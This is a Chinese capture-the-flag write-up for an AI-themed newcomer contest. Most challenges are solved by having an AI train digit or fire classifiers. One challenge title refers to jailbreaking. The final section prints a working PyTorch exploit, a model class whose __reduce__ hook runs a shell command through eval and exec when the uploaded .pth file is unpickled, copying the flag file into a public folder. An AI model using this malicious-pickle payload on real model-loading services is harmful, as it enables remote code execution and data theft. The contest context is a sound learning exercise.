【AI】2025 0x401新生交流赛 wp

目录

许哥的数字游戏

🤫歌的😡🔥

[Aura JailBreak](#Aura JailBreak)

明阳未许

[🔥🌸 LittFlower: Fire Boom! 🌸🔥](#🔥🌸 LittFlower: Fire Boom! 🌸🔥)


许哥的数字游戏

就是用题目给的数据去训练个模型识别数字

先叫ai解读下附件内容

让ai根据数据集训练个模型

把题目交互方式告诉ai,写个解题脚本拿到flag

🤫歌的😡🔥

附件内容,一个是有火的图,一个是没火的图

还是让ai训练模型&写交互

拿到flag

Aura JailBreak

明阳未许

一样是ai秒了

🔥🌸 LittFlower: Fire Boom! 🌸🔥

复制代码
import torch
import torch.nn as nn
from torchvision import models
import builtins
import os

class MaliciousMobileNetV2(models.MobileNetV2):
    def __init__(self, num_classes=2):
        super().__init__(num_classes=num_classes)
        
    def __reduce__(self):
        
        state_dict = self.state_dict()

        fake_state_dict = state_dict.copy()
        
        if "classifier.1.weight" in fake_state_dict:
            del fake_state_dict["classifier.1.weight"]
        if "classifier.1.bias" in fake_state_dict:
            del fake_state_dict["classifier.1.bias"]
        cmd = "import os; os.system('cp /flag /app/static/flag.txt')"
        
        return (builtins.eval, (
            "(exec(cmd), state_dict)[1]", 
            {'cmd': cmd, 'state_dict': fake_state_dict}
        ))

if __name__ == '__main__':
    model = MaliciousMobileNetV2(num_classes=2)
    save_path = 'evil.pth'
    print(f"正在生成 Payload: {save_path} ...")
    torch.save(model, save_path)
    print("生成成功!")

上传脚本生成的.pth文件,加载模型触发pickle反序列化RCE拿到flag

相关推荐
爱打代码的小林几秒前
机器学习(TF-IDF)
人工智能·tf-idf
档案宝档案管理6 分钟前
权限分级+加密存储+操作追溯,筑牢会计档案安全防线
大数据·网络·人工智能·安全·档案·档案管理
数据光子6 分钟前
【YOLO数据集】国内交通信号检测
人工智能·python·安全·yolo·目标检测·目标跟踪
霍格沃兹测试开发学社测试人社区12 分钟前
GitLab 测试用例:实现 Web 场景批量自动化执行的方法
人工智能·智能体
Mintopia12 分钟前
🤖 AI 应用自主决策的可行性 — 一场从逻辑电路到灵魂选择的奇妙旅程
人工智能·aigc·全栈
百***787513 分钟前
2026 优化版 GPT-5.2 国内稳定调用指南:API 中转实操与成本优化
开发语言·人工智能·python
:mnong14 分钟前
辅助学习神经网络
人工智能·神经网络·学习
jinyeyiqi202615 分钟前
城市噪声监测设备技术解析及智慧城市应用方案 金叶仪器全场景适配的城市噪声监测设备
人工智能·智慧城市
夏秃然16 分钟前
打破预测与决策的孤岛:如何构建“能源垂类大模型”?
算法·ai·大模型
光锥智能16 分钟前
蚂蚁阿福月活用户已达3000万,OpenAI跟进发布ChatGPT Health
人工智能·chatgpt